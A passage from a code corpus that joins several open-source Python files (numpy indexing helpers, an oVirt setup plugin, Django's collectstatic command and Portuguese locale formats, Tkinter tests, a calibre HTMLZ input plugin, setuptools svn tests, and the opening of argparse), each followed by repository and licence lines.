0) (1, 0, 0) (1, 1, 0) (2, 0, 0) (2, 1, 0) """ def __init__(self, *args): if len(args) == 1 and isinstance(args[0], tuple): args = args[0] self.nd = len(args) self.ind = [0]*self.nd self.index = 0 self.maxvals = args tot = 1 for k in range(self.nd): tot *= args[k] self.total = tot def _incrementone(self, axis): if (axis < 0): # base case return if (self.ind[axis] < self.maxvals[axis]-1): self.ind[axis] += 1 else: self.ind[axis] = 0 self._incrementone(axis-1) def ndincr(self): """ Increment the multi-dimensional index by one. `ndincr` takes care of the "wrapping around" of the axes. It is called by `ndindex.next` and not normally used directly. """ self._incrementone(self.nd-1) def next(self): """ Standard iterator method, updates the index and returns the index tuple. Returns ------- val : tuple of ints Returns a tuple containing the indices of the current iteration. """ if (self.index >= self.total): raise StopIteration val = tuple(self.ind) self.index += 1 self.ndincr() return val def __iter__(self): return self # You can do all this with slice() plus a few special objects, # but there's a lot to remember. This version is simpler because # it uses the standard array indexing syntax. # # Written by Konrad Hinsen <hinsen@cnrs-orleans.fr> # last revision: 1999-7-23 # # Cosmetic changes by T. Oliphant 2001 # # class IndexExpression(object): """ A nicer way to build up index tuples for arrays. .. note:: Use one of the two predefined instances `index_exp` or `s_` rather than directly using `IndexExpression`. For any index combination, including slicing and axis insertion, ``a[indices]`` is the same as ``a[np.index_exp[indices]]`` for any array `a`. However, ``np.index_exp[indices]`` can be used anywhere in Python code and returns a tuple of slice objects that can be used in the construction of complex index expressions. Parameters ---------- maketuple : bool If True, always returns a tuple. See Also -------- index_exp : Predefined instance that always returns a tuple: `index_exp = IndexExpression(maketuple=True)`. s_ : Predefined instance without tuple conversion: `s_ = IndexExpression(maketuple=False)`. Notes ----- You can do all this with `slice()` plus a few special objects, but there's a lot to remember and this version is simpler because it uses the standard array indexing syntax. Examples -------- >>> np.s_[2::2] slice(2, None, 2) >>> np.index_exp[2::2] (slice(2, None, 2),) >>> np.array([0, 1, 2, 3, 4])[np.s_[2::2]] array([2, 4]) """ def __init__(self, maketuple): self.maketuple = maketuple def __getitem__(self, item): if self.maketuple and type(item) != tuple: return (item,) else: return item index_exp = IndexExpression(maketuple=True) s_ = IndexExpression(maketuple=False) # End contribution from Konrad. # The following functions complement those in twodim_base, but are # applicable to N-dimensions. def fill_diagonal(a, val): """ Fill the main diagonal of the given array of any dimensionality. For an array `a` with ``a.ndim > 2``, the diagonal is the list of locations with indices ``a[i, i, ..., i]`` all identical. This function modifies the input array in-place, it does not return a value. Parameters ---------- a : array, at least 2-D. Array whose diagonal is to be filled, it gets modified in-place. val : scalar Value to be written on the diagonal, its type must be compatible with that of the array a. See also -------- diag_indices, diag_indices_from Notes ----- .. versionadded:: 1.4.0 This functionality can be obtained via `diag_indices`, but internally this version uses a much faster implementation that never constructs the indices and uses simple slicing. Examples -------- >>> a = np.zeros((3, 3), int) >>> np.fill_diagonal(a, 5) >>> a array([[5, 0, 0], [0, 5, 0], [0, 0, 5]]) The same function can operate on a 4-D array: >>> a = np.zeros((3, 3, 3, 3), int) >>> np.fill_diagonal(a, 4) We only show a few blocks for clarity: >>> a[0, 0] array([[4, 0, 0], [0, 0, 0], [0, 0, 0]]) >>> a[1, 1] array([[0, 0, 0], [0, 4, 0], [0, 0, 0]]) >>> a[2, 2] array([[0, 0, 0], [0, 0, 0], [0, 0, 4]]) """ if a.ndim < 2: raise ValueError("array must be at least 2-d") if a.ndim == 2: # Explicit, fast formula for the common case. For 2-d arrays, we # accept rectangular ones. step = a.shape[1] + 1 else: # For more than d=2, the strided formula is only valid for arrays with # all dimensions equal, so we check first. if not alltrue(diff(a.shape)==0): raise ValueError("All dimensions of input must be of equal length") step = 1 + (cumprod(a.shape[:-1])).sum() # Write the value out into the diagonal. a.flat[::step] = val def diag_indices(n, ndim=2): """ Return the indices to access the main diagonal of an array. This returns a tuple of indices that can be used to access the main diagonal of an array `a` with ``a.ndim >= 2`` dimensions and shape (n, n, ..., n). For ``a.ndim = 2`` this is the usual diagonal, for ``a.ndim > 2`` this is the set of indices to access ``a[i, i, ..., i]`` for ``i = [0..n-1]``. Parameters ---------- n : int The size, along each dimension, of the arrays for which the returned indices can be used. ndim : int, optional The number of dimensions. See also -------- diag_indices_from Notes ----- .. versionadded:: 1.4.0 Examples -------- Create a set of indices to access the diagonal of a (4, 4) array: >>> di = np.diag_indices(4) >>> di (array([0, 1, 2, 3]), array([0, 1, 2, 3])) >>> a = np.arange(16).reshape(4, 4) >>> a array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15]]) >>> a[di] = 100 >>> a array([[100, 1, 2, 3], [ 4, 100, 6, 7], [ 8, 9, 100, 11], [ 12, 13, 14, 100]]) Now, we create indices to manipulate a 3-D array: >>> d3 = np.diag_indices(2, 3) >>> d3 (array([0, 1]), array([0, 1]), array([0, 1])) And use it to set the diagonal of an array of zeros to 1: >>> a = np.zeros((2, 2, 2), dtype=np.int) >>> a[d3] = 1 >>> a array([[[1, 0], [0, 0]], [[0, 0], [0, 1]]]) """ idx = arange(n) return (idx,) * ndim def diag_indices_from(arr): """ Return the indices to access the main diagonal of an n-dimensional array. See `diag_indices` for full details. Parameters ---------- arr : array, at least 2-D See Also -------- diag_indices Notes ----- .. versionadded:: 1.4.0 """ if not arr.ndim >= 2: raise ValueError("input array must be at least 2-d") # For more than d=2, the strided formula is only valid for arrays with # all dimensions equal, so we check first. if not alltrue(diff(arr.shape) == 0): raise ValueError("All dimensions of input must be of equal length") return diag_indices(arr.shape[0], arr.ndim)
gpl-3.0
walteryang47/ovirt-engine
packaging/setup/plugins/ovirt-engine-common/ovirt-engine/core/fence_kdump_listener.py
8
2091
# # ovirt-engine-setup -- ovirt engine setup # Copyright (C) 2014-2015 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """fence_kdump listener plugin.""" import gettext from otopi import plugin, util from ovirt_engine_setup import constants as osetupcons from ovirt_engine_setup.engine import constants as oenginecons from ovirt_engine_setup.engine_common import constants as oengcommcons def _(m): return gettext.dgettext(message=m, domain='ovirt-engine-setup') @util.export class Plugin(plugin.PluginBase): """fence_kdump listener plugin.""" def __init__(self, context): super(Plugin, self).__init__(context=context) @plugin.event( stage=plugin.Stages.STAGE_INIT, ) def _init(self): self.environment.setdefault( oengcommcons.ConfigEnv.FENCE_KDUMP_LISTENER_STOP_NEEDED, False ) @plugin.event( stage=plugin.Stages.STAGE_TRANSACTION_BEGIN, condition=lambda self: not self.environment[ osetupcons.CoreEnv.DEVELOPER_MODE ] and self.environment[ oengcommcons.ConfigEnv.FENCE_KDUMP_LISTENER_STOP_NEEDED ], ) def _transactionBegin(self): if self.services.exists( name=oenginecons.Const.FENCE_KDUMP_LISTENER_SERVICE_NAME, ): self.logger.info(_('Stopping ovirt-fence-kdump-listener service')) self.services.state( name=oenginecons.Const.FENCE_KDUMP_LISTENER_SERVICE_NAME, state=False ) # vim: expandtab tabstop=4 shiftwidth=4
apache-2.0
Distrotech/intellij-community
python/lib/Lib/site-packages/django/contrib/staticfiles/management/commands/collectstatic.py
71
8207
import os import sys import shutil from optparse import make_option from django.conf import settings from django.core.files.storage import get_storage_class from django.core.management.base import CommandError, NoArgsCommand from django.contrib.staticfiles import finders class Command(NoArgsCommand): """ Command that allows to copy or symlink media files from different locations to the settings.STATIC_ROOT. """ option_list = NoArgsCommand.option_list + ( make_option('--noinput', action='store_false', dest='interactive', default=True, help="Do NOT prompt the user for input of any " "kind."), make_option('-i', '--ignore', action='append', default=[], dest='ignore_patterns', metavar='PATTERN', help="Ignore files or directories matching this glob-style " "pattern. Use multiple times to ignore more."), make_option('-n', '--dry-run', action='store_true', dest='dry_run', default=False, help="Do everything except modify the filesystem."), make_option('-l', '--link', action='store_true', dest='link', default=False, help="Create a symbolic link to each file instead of copying."), make_option('--no-default-ignore', action='store_false', dest='use_default_ignore_patterns', default=True, help="Don't ignore the common private glob-style patterns 'CVS', " "'.*' and '*~'."), ) help = "Collect static files from apps and other locations in a single location." def handle_noargs(self, **options): symlink = options['link'] ignore_patterns = options['ignore_patterns'] if options['use_default_ignore_patterns']: ignore_patterns += ['CVS', '.*', '*~'] ignore_patterns = list(set(ignore_patterns)) self.copied_files = set() self.symlinked_files = set() self.unmodified_files = set() self.destination_storage = get_storage_class(settings.STATICFILES_STORAGE)() try: self.destination_storage.path('') except NotImplementedError: self.destination_local = False else: self.destination_local = True if symlink: if sys.platform == 'win32': raise CommandError("Symlinking is not supported by this " "platform (%s)." % sys.platform) if not self.destination_local: raise CommandError("Can't symlink to a remote destination.") # Warn before doing anything more. if options.get('interactive'): confirm = raw_input(""" You have requested to collate static files and collect them at the destination location as specified in your settings file. This will overwrite existing files. Are you sure you want to do this? Type 'yes' to continue, or 'no' to cancel: """) if confirm != 'yes': raise CommandError("Static files build cancelled.") # Use ints for file times (ticket #14665) os.stat_float_times(False) for finder in finders.get_finders(): for source, prefix, storage in finder.list(ignore_patterns): self.copy_file(source, prefix, storage, **options) verbosity = int(options.get('verbosity', 1)) actual_count = len(self.copied_files) + len(self.symlinked_files) unmodified_count = len(self.unmodified_files) if verbosity >= 1: self.stdout.write("\n%s static file%s %s to '%s'%s.\n" % (actual_count, actual_count != 1 and 's' or '', symlink and 'symlinked' or 'copied', settings.STATIC_ROOT, unmodified_count and ' (%s unmodified)' % unmodified_count or '')) def copy_file(self, source, prefix, source_storage, **options): """ Attempt to copy (or symlink) ``source`` to ``destination``, returning True if successful. """ source_path = source_storage.path(source) try: source_last_modified = source_storage.modified_time(source) except (OSError, NotImplementedError): source_last_modified = None if prefix: destination = '/'.join([prefix, source]) else: destination = source symlink = options['link'] dry_run = options['dry_run'] verbosity = int(options.get('verbosity', 1)) if destination in self.copied_files: if verbosity >= 2: self.stdout.write("Skipping '%s' (already copied earlier)\n" % destination) return False if destination in self.symlinked_files: if verbosity >= 2: self.stdout.write("Skipping '%s' (already linked earlier)\n" % destination) return False if self.destination_storage.exists(destination): try: destination_last_modified = \ self.destination_storage.modified_time(destination) except (OSError, NotImplementedError): # storage doesn't support ``modified_time`` or failed. pass else: destination_is_link = os.path.islink( self.destination_storage.path(destination)) if destination_last_modified >= source_last_modified: if (not symlink and not destination_is_link): if verbosity >= 2: self.stdout.write("Skipping '%s' (not modified)\n" % destination) self.unmodified_files.add(destination) return False if dry_run: if verbosity >= 2: self.stdout.write("Pretending to delete '%s'\n" % destination) else: if verbosity >= 2: self.stdout.write("Deleting '%s'\n" % destination) self.destination_storage.delete(destination) if symlink: destination_path = self.destination_storage.path(destination) if dry_run: if verbosity >= 1: self.stdout.write("Pretending to symlink '%s' to '%s'\n" % (source_path, destination_path)) else: if verbosity >= 1: self.stdout.write("Symlinking '%s' to '%s'\n" % (source_path, destination_path)) try: os.makedirs(os.path.dirname(destination_path)) except OSError: pass os.symlink(source_path, destination_path) self.symlinked_files.add(destination) else: if dry_run: if verbosity >= 1: self.stdout.write("Pretending to copy '%s' to '%s'\n" % (source_path, destination)) else: if self.destination_local: destination_path = self.destination_storage.path(destination) try: os.makedirs(os.path.dirname(destination_path)) except OSError: pass shutil.copy2(source_path, destination_path) if verbosity >= 1: self.stdout.write("Copying '%s' to '%s'\n" % (source_path, destination_path)) else: source_file = source_storage.open(source) self.destination_storage.save(destination, source_file) if verbosity >= 1: self.stdout.write("Copying %s to %s\n" % (source_path, destination)) self.copied_files.add(destination) return True
apache-2.0
snasoft/QtCreatorPluginsPack
Bin/3rdParty/vera/bin/lib/test/test_tcl.py
38
4483
#!/usr/bin/env python import unittest import os from test import test_support # Skip this test if the _tkinter module wasn't built. _tkinter = test_support.import_module('_tkinter') from Tkinter import Tcl from _tkinter import TclError class TkinterTest(unittest.TestCase): def testFlattenLen(self): # flatten(<object with no length>) self.assertRaises(TypeError, _tkinter._flatten, True) class TclTest(unittest.TestCase): def setUp(self): self.interp = Tcl() def testEval(self): tcl = self.interp tcl.eval('set a 1') self.assertEqual(tcl.eval('set a'),'1') def testEvalException(self): tcl = self.interp self.assertRaises(TclError,tcl.eval,'set a') def testEvalException2(self): tcl = self.interp self.assertRaises(TclError,tcl.eval,'this is wrong') def testCall(self): tcl = self.interp tcl.call('set','a','1') self.assertEqual(tcl.call('set','a'),'1') def testCallException(self): tcl = self.interp self.assertRaises(TclError,tcl.call,'set','a') def testCallException2(self): tcl = self.interp self.assertRaises(TclError,tcl.call,'this','is','wrong') def testSetVar(self): tcl = self.interp tcl.setvar('a','1') self.assertEqual(tcl.eval('set a'),'1') def testSetVarArray(self): tcl = self.interp tcl.setvar('a(1)','1') self.assertEqual(tcl.eval('set a(1)'),'1') def testGetVar(self): tcl = self.interp tcl.eval('set a 1') self.assertEqual(tcl.getvar('a'),'1') def testGetVarArray(self): tcl = self.interp tcl.eval('set a(1) 1') self.assertEqual(tcl.getvar('a(1)'),'1') def testGetVarException(self): tcl = self.interp self.assertRaises(TclError,tcl.getvar,'a') def testGetVarArrayException(self): tcl = self.interp self.assertRaises(TclError,tcl.getvar,'a(1)') def testUnsetVar(self): tcl = self.interp tcl.setvar('a',1) self.assertEqual(tcl.eval('info exists a'),'1') tcl.unsetvar('a') self.assertEqual(tcl.eval('info exists a'),'0') def testUnsetVarArray(self): tcl = self.interp tcl.setvar('a(1)',1) tcl.setvar('a(2)',2) self.assertEqual(tcl.eval('info exists a(1)'),'1') self.assertEqual(tcl.eval('info exists a(2)'),'1') tcl.unsetvar('a(1)') self.assertEqual(tcl.eval('info exists a(1)'),'0') self.assertEqual(tcl.eval('info exists a(2)'),'1') def testUnsetVarException(self): tcl = self.interp self.assertRaises(TclError,tcl.unsetvar,'a') def testEvalFile(self): tcl = self.interp filename = "testEvalFile.tcl" fd = open(filename,'w') script = """set a 1 set b 2 set c [ expr $a + $b ] """ fd.write(script) fd.close() tcl.evalfile(filename) os.remove(filename) self.assertEqual(tcl.eval('set a'),'1') self.assertEqual(tcl.eval('set b'),'2') self.assertEqual(tcl.eval('set c'),'3') def testEvalFileException(self): tcl = self.interp filename = "doesnotexists" try: os.remove(filename) except Exception,e: pass self.assertRaises(TclError,tcl.evalfile,filename) def testPackageRequireException(self): tcl = self.interp self.assertRaises(TclError,tcl.eval,'package require DNE') def testLoadWithUNC(self): import sys if sys.platform != 'win32': return # Build a UNC path from the regular path. # Something like # \\%COMPUTERNAME%\c$\python27\python.exe fullname = os.path.abspath(sys.executable) if fullname[1] != ':': return unc_name = r'\\%s\%s$\%s' % (os.environ['COMPUTERNAME'], fullname[0], fullname[3:]) with test_support.EnvironmentVarGuard() as env: env.unset("TCL_LIBRARY") f = os.popen('%s -c "import Tkinter; print Tkinter"' % (unc_name,)) self.assertTrue('Tkinter.py' in f.read()) # exit code must be zero self.assertEqual(f.close(), None) def test_main(): test_support.run_unittest(TclTest, TkinterTest) if __name__ == "__main__": test_main()
lgpl-3.0
timpalpant/calibre
src/calibre/ebooks/conversion/plugins/htmlz_input.py
15
4783
# -*- coding: utf-8 -*- from __future__ import (unicode_literals, division, absolute_import, print_function) __license__ = 'GPL 3' __copyright__ = '2011, John Schember <john@nachtimwald.com>' __docformat__ = 'restructuredtext en' import os from calibre import guess_type from calibre.customize.conversion import InputFormatPlugin class HTMLZInput(InputFormatPlugin): name = 'HTLZ Input' author = 'John Schember' description = 'Convert HTML files to HTML' file_types = set(['htmlz']) def convert(self, stream, options, file_ext, log, accelerators): from calibre.ebooks.chardet import xml_to_unicode from calibre.ebooks.metadata.opf2 import OPF from calibre.utils.zipfile import ZipFile self.log = log html = u'' top_levels = [] # Extract content from zip archive. zf = ZipFile(stream) zf.extractall() # Find the HTML file in the archive. It needs to be # top level. index = u'' multiple_html = False # Get a list of all top level files in the archive. for x in os.listdir(u'.'): if os.path.isfile(x): top_levels.append(x) # Try to find an index. file. for x in top_levels: if x.lower() in (u'index.html', u'index.xhtml', u'index.htm'): index = x break # Look for multiple HTML files in the archive. We look at the # top level files only as only they matter in HTMLZ. for x in top_levels: if os.path.splitext(x)[1].lower() in (u'.html', u'.xhtml', u'.htm'): # Set index to the first HTML file found if it's not # called index. if not index: index = x else: multiple_html = True # Warn the user if there multiple HTML file in the archive. HTMLZ # supports a single HTML file. A conversion with a multiple HTML file # HTMLZ archive probably won't turn out as the user expects. With # Multiple HTML files ZIP input should be used in place of HTMLZ. if multiple_html: log.warn(_('Multiple HTML files found in the archive. Only %s will be used.') % index) if index: with open(index, 'rb') as tf: html = tf.read() else: raise Exception(_('No top level HTML file found.')) if not html: raise Exception(_('Top level HTML file %s is empty') % index) # Encoding if options.input_encoding: ienc = options.input_encoding else: ienc = xml_to_unicode(html[:4096])[-1] html = html.decode(ienc, 'replace') # Run the HTML through the html processing plugin. from calibre.customize.ui import plugin_for_input_format html_input = plugin_for_input_format('html') for opt in html_input.options: setattr(options, opt.option.name, opt.recommended_value) options.input_encoding = 'utf-8' base = os.getcwdu() fname = os.path.join(base, u'index.html') c = 0 while os.path.exists(fname): c += 1 fname = u'index%d.html'%c htmlfile = open(fname, 'wb') with htmlfile: htmlfile.write(html.encode('utf-8')) odi = options.debug_pipeline options.debug_pipeline = None # Generate oeb from html conversion. oeb = html_input.convert(open(htmlfile.name, 'rb'), options, 'html', log, {}) options.debug_pipeline = odi os.remove(htmlfile.name) # Set metadata from file. from calibre.customize.ui import get_file_type_metadata from calibre.ebooks.oeb.transforms.metadata import meta_info_to_oeb_metadata mi = get_file_type_metadata(stream, file_ext) meta_info_to_oeb_metadata(mi, oeb.metadata, log) # Get the cover path from the OPF. cover_path = None opf = None for x in top_levels: if os.path.splitext(x)[1].lower() == u'.opf': opf = x break if opf: opf = OPF(opf, basedir=os.getcwdu()) cover_path = opf.raster_cover or opf.cover # Set the cover. if cover_path: cdata = None with open(os.path.join(os.getcwdu(), cover_path), 'rb') as cf: cdata = cf.read() cover_name = os.path.basename(cover_path) id, href = oeb.manifest.generate('cover', cover_name) oeb.manifest.add(id, href, guess_type(cover_name)[0], data=cdata) oeb.guide.add('cover', 'Cover', href) return oeb
gpl-3.0
freakynit/vertx-web
src/test/sockjs-protocol/venv/lib/python2.7/site-packages/setuptools/tests/test_svn.py
300
7806
# -*- coding: utf-8 -*- """svn tests""" import io import os import subprocess import sys import unittest from setuptools.tests import environment from setuptools.compat import unicode, unichr from setuptools import svn_utils from setuptools.tests.py26compat import skipIf def _do_svn_check(): try: subprocess.check_call(["svn", "--version"], shell=(sys.platform == 'win32')) return True except (OSError, subprocess.CalledProcessError): return False _svn_check = _do_svn_check() class TestSvnVersion(unittest.TestCase): def test_no_svn_found(self): path_variable = None for env in os.environ: if env.lower() == 'path': path_variable = env if path_variable is None: try: self.skipTest('Cannot figure out how to modify path') except AttributeError: # PY26 doesn't have this return old_path = os.environ[path_variable] os.environ[path_variable] = '' try: version = svn_utils.SvnInfo.get_svn_version() self.assertEqual(version, '') finally: os.environ[path_variable] = old_path @skipIf(not _svn_check, "No SVN to text, in the first place") def test_svn_should_exist(self): version = svn_utils.SvnInfo.get_svn_version() self.assertNotEqual(version, '') def _read_utf8_file(path): fileobj = None try: fileobj = io.open(path, 'r', encoding='utf-8') data = fileobj.read() return data finally: if fileobj: fileobj.close() class ParserInfoXML(unittest.TestCase): def parse_tester(self, svn_name, ext_spaces): path = os.path.join('setuptools', 'tests', 'svn_data', svn_name + '_info.xml') #Remember these are pre-generated to test XML parsing # so these paths might not valid on your system example_base = "%s_example" % svn_name data = _read_utf8_file(path) expected = set([ ("\\".join((example_base, 'a file')), 'file'), ("\\".join((example_base, 'folder')), 'dir'), ("\\".join((example_base, 'folder', 'lalala.txt')), 'file'), ("\\".join((example_base, 'folder', 'quest.txt')), 'file'), ]) self.assertEqual(set(x for x in svn_utils.parse_dir_entries(data)), expected) def test_svn13(self): self.parse_tester('svn13', False) def test_svn14(self): self.parse_tester('svn14', False) def test_svn15(self): self.parse_tester('svn15', False) def test_svn16(self): self.parse_tester('svn16', True) def test_svn17(self): self.parse_tester('svn17', True) def test_svn18(self): self.parse_tester('svn18', True) class ParserExternalXML(unittest.TestCase): def parse_tester(self, svn_name, ext_spaces): path = os.path.join('setuptools', 'tests', 'svn_data', svn_name + '_ext_list.xml') example_base = svn_name + '_example' data = _read_utf8_file(path) if ext_spaces: folder2 = 'third party2' folder3 = 'third party3' else: folder2 = 'third_party2' folder3 = 'third_party3' expected = set([ os.sep.join((example_base, folder2)), os.sep.join((example_base, folder3)), # folder is third_party大介 os.sep.join((example_base, unicode('third_party') + unichr(0x5927) + unichr(0x4ecb))), os.sep.join((example_base, 'folder', folder2)), os.sep.join((example_base, 'folder', folder3)), os.sep.join((example_base, 'folder', unicode('third_party') + unichr(0x5927) + unichr(0x4ecb))), ]) expected = set(os.path.normpath(x) for x in expected) dir_base = os.sep.join(('C:', 'development', 'svn_example')) self.assertEqual(set(x for x in svn_utils.parse_externals_xml(data, dir_base)), expected) def test_svn15(self): self.parse_tester('svn15', False) def test_svn16(self): self.parse_tester('svn16', True) def test_svn17(self): self.parse_tester('svn17', True) def test_svn18(self): self.parse_tester('svn18', True) class ParseExternal(unittest.TestCase): def parse_tester(self, svn_name, ext_spaces): path = os.path.join('setuptools', 'tests', 'svn_data', svn_name + '_ext_list.txt') data = _read_utf8_file(path) if ext_spaces: expected = set(['third party2', 'third party3', 'third party3b', 'third_party']) else: expected = set(['third_party2', 'third_party3', 'third_party']) self.assertEqual(set(x for x in svn_utils.parse_external_prop(data)), expected) def test_svn13(self): self.parse_tester('svn13', False) def test_svn14(self): self.parse_tester('svn14', False) def test_svn15(self): self.parse_tester('svn15', False) def test_svn16(self): self.parse_tester('svn16', True) def test_svn17(self): self.parse_tester('svn17', True) def test_svn18(self): self.parse_tester('svn18', True) class TestSvn(environment.ZippedEnvironment): def setUp(self): version = svn_utils.SvnInfo.get_svn_version() if not version: # empty or null self.dataname = None self.datafile = None return self.base_version = tuple([int(x) for x in version.split('.')[:2]]) if self.base_version < (1,3): raise ValueError('Insufficient SVN Version %s' % version) elif self.base_version >= (1,9): #trying the latest version self.base_version = (1,8) self.dataname = "svn%i%i_example" % self.base_version self.datafile = os.path.join('setuptools', 'tests', 'svn_data', self.dataname + ".zip") super(TestSvn, self).setUp() @skipIf(not _svn_check, "No SVN to text, in the first place") def test_revision(self): rev = svn_utils.SvnInfo.load('.').get_revision() self.assertEqual(rev, 6) @skipIf(not _svn_check, "No SVN to text, in the first place") def test_entries(self): expected = set([ (os.path.join('a file'), 'file'), (os.path.join('folder'), 'dir'), (os.path.join('folder', 'lalala.txt'), 'file'), (os.path.join('folder', 'quest.txt'), 'file'), #The example will have a deleted file (or should) #but shouldn't return it ]) info = svn_utils.SvnInfo.load('.') self.assertEqual(set(x for x in info.entries), expected) @skipIf(not _svn_check, "No SVN to text, in the first place") def test_externals(self): if self.base_version >= (1,6): folder2 = 'third party2' folder3 = 'third party3' else: folder2 = 'third_party2' folder3 = 'third_party3' expected = set([ os.path.join(folder2), os.path.join(folder3), os.path.join('third_party'), os.path.join('folder', folder2), os.path.join('folder', folder3), os.path.join('folder', 'third_party'), ]) info = svn_utils.SvnInfo.load('.') self.assertEqual(set([x for x in info.externals]), expected) def test_suite(): return unittest.defaultTestLoader.loadTestsFromName(__name__)
apache-2.0
dursk/django
django/conf/locale/pt/formats.py
504
1717
# -*- encoding: utf-8 -*- # This file is distributed under the same license as the Django package. # from __future__ import unicode_literals # The *_FORMAT strings use the Django date format syntax, # see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date DATE_FORMAT = r'j \d\e F \d\e Y' TIME_FORMAT = 'H:i' DATETIME_FORMAT = r'j \d\e F \d\e Y à\s H:i' YEAR_MONTH_FORMAT = r'F \d\e Y' MONTH_DAY_FORMAT = r'j \d\e F' SHORT_DATE_FORMAT = 'd/m/Y' SHORT_DATETIME_FORMAT = 'd/m/Y H:i' FIRST_DAY_OF_WEEK = 0 # Sunday # The *_INPUT_FORMATS strings use the Python strftime format syntax, # see http://docs.python.org/library/datetime.html#strftime-strptime-behavior # Kept ISO formats as they are in first position DATE_INPUT_FORMATS = [ '%Y-%m-%d', '%d/%m/%Y', '%d/%m/%y', # '2006-10-25', '25/10/2006', '25/10/06' # '%d de %b de %Y', '%d de %b, %Y', # '25 de Out de 2006', '25 Out, 2006' # '%d de %B de %Y', '%d de %B, %Y', # '25 de Outubro de 2006', '25 de Outubro, 2006' ] DATETIME_INPUT_FORMATS = [ '%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59' '%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200' '%Y-%m-%d %H:%M', # '2006-10-25 14:30' '%Y-%m-%d', # '2006-10-25' '%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59' '%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200' '%d/%m/%Y %H:%M', # '25/10/2006 14:30' '%d/%m/%Y', # '25/10/2006' '%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59' '%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200' '%d/%m/%y %H:%M', # '25/10/06 14:30' '%d/%m/%y', # '25/10/06' ] DECIMAL_SEPARATOR = ',' THOUSAND_SEPARATOR = '.' NUMBER_GROUPING = 3
bsd-3-clause
javier-ruiz-b/docker-rasppi-images
raspberry-google-home/env/lib/python3.7/site-packages/argparse.py
81
89214
# Author: Steven J. Bethard <steven.bethard@gmail.com>. # Maintainer: Thomas Waldmann <tw@waldmann-edv.de> """Command-line parsing library This module is an optparse-inspired command-line parsing library that: - handles both optional and positional arguments - produces highly informative usage messages - supports parsers that dispatch to sub-parsers The following is a simple usage example that sums integers from the command-line and writes the result to a file:: parser = argparse.ArgumentParser( description='sum the integers at the command line') parser.add_argument( 'integers', metavar='int', nargs='+', type=int, help='an integer to be summed') parser.add_argument( '--log', default=sys.stdout, type=argparse.FileType('w'), help='the file where the sum should be written') args = parser.parse_args() args.log.write('%s' % sum(args.integers)) args.log.close() The module contains the following public classes: - ArgumentParser -- The main entry point for command-line parsing. As the example above shows, the add_argument() method is used to populate the parser with actions for optional and positional arguments. Then the parse_args() method is invoked to convert the args at the command-line into an object with attributes. - ArgumentError -- The exception raised by ArgumentParser objects when there are errors with the parser's actions. Errors raised while parsing the command-line are caught by ArgumentParser and emitted as command-line messages. - FileType -- A factory for defining types of files to be created. As the example above shows, instances of FileType are typically passed as the type= argument of add_argument() calls. - Action -- The base class for parser actions. Typically actions are selected by passing strings like 'store_true' or 'append_const' to the action= argument of add_argument(). However, for greater customization of ArgumentParser actions, subclasses of Action may be defined and passed as the action= argument. - HelpFormatter, RawDescriptionHelpFormatter, RawTextHelpFormatter, ArgumentDefaultsHelpFormatter -- Formatter classes which may be passed as the formatter_class= argument to the ArgumentParser constructor. HelpFormatter is the default, RawDescriptionHelpFormatter and RawTextHelpFormatter tell the parser not to change the formatting for help text, and ArgumentDefaultsHelpFormatter adds information about argument defaults to the help. All other classes in this module are considered implementation details. (Also note that HelpFormatter and RawDescriptionHelpFormatter are only considered public as object names -- the API of the formatter objects is still considered an implementation detail.) """ __version__ = '1.4.0' # we use our own version number independant of the # one in stdlib and we release this on pypi. __external_lib__ = True # to make sure the tests really test THIS lib, # not the builtin one in Python stdlib __all__ = [ 'ArgumentParser', 'ArgumentError', 'ArgumentTypeError', 'FileType', 'HelpFormatter', 'ArgumentDefaultsHelpFormatter', 'RawDescriptionHelpFormatter', 'RawTextHelpFormatter', 'Namespace', 'Action', 'ONE_OR_MORE', 'OPTIONAL', 'PARSER', 'REMAINDER', 'SUPPRESS', 'ZERO_OR_MORE', ] import copy as _copy import os as _os import re as _re import sys as _sys import textwrap as _textwrap from gettext import gettext as _ try: set except NameError: # for python < 2.4 compatibility (sets module is there since 2.3): from sets import Set as set try: basestring except NameError: basestring = str try: sorted except NameError: # for python < 2.4 compatibility: def sorted(iterable, reverse=False): result = list(iterable) result.sort() if reverse: result.reverse() return result def _callable(obj): return hasattr(obj, '__call__') or hasattr(obj, '__bases__') SUPPRESS = '==SUPPRESS==' OPTIONAL = '?' ZERO_OR_MORE = '*' ONE_OR_MORE = '+' PARSER = 'A...' REMAINDER = '...' _UNRECOGNIZED_ARGS_ATTR = '_unrecognized_args' # ============================= # Utility functions and classes # ============================= class _AttributeHolder(object): """Abstract base class that provides __repr__. The __repr__ method returns a string in the format:: ClassName(attr=name, attr=name, ...) The attributes are determined either by a class-level attribute, '_kwarg_names', or by inspecting the instance __dict__. """ def __repr__(self): type_name = type(self).__name__ arg_strings = [] for arg in self._get_args(): arg_strings.append(repr(arg)) for name, value in self._get_kwargs(): arg_strings.append('%s=%r' % (name, value)) return '%s(%s)' % (type_name, ', '.join(arg_strings)) def _get_kwargs(self): return sorted(self.__dict__.items()) def _get_args(self): return [] def _ensure_value(namespace, name, value): if getattr(namespace, name, None) is None: setattr(namespace, name, value) return getattr(namespace, name) # =============== # Formatting Help # =============== class HelpFormatter(object): """Formatter for generating usage messages and argument help strings. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def __init__(self, prog, indent_increment=2, max_help_position=24, width=None): # default setting for width if width is None: try: width = int(_os.environ['COLUMNS']) except (KeyError, ValueError): width = 80 width -= 2 self._prog = prog self._indent_increment = indent_increment self._max_help_position = max_help_position self._width = width self._current_indent = 0 self._level = 0 self._action_max_length = 0 self._root_section = self._Section(self, None) self._current_section = self._root_section self._whitespace_matcher = _re.compile(r'\s+') self._long_break_matcher = 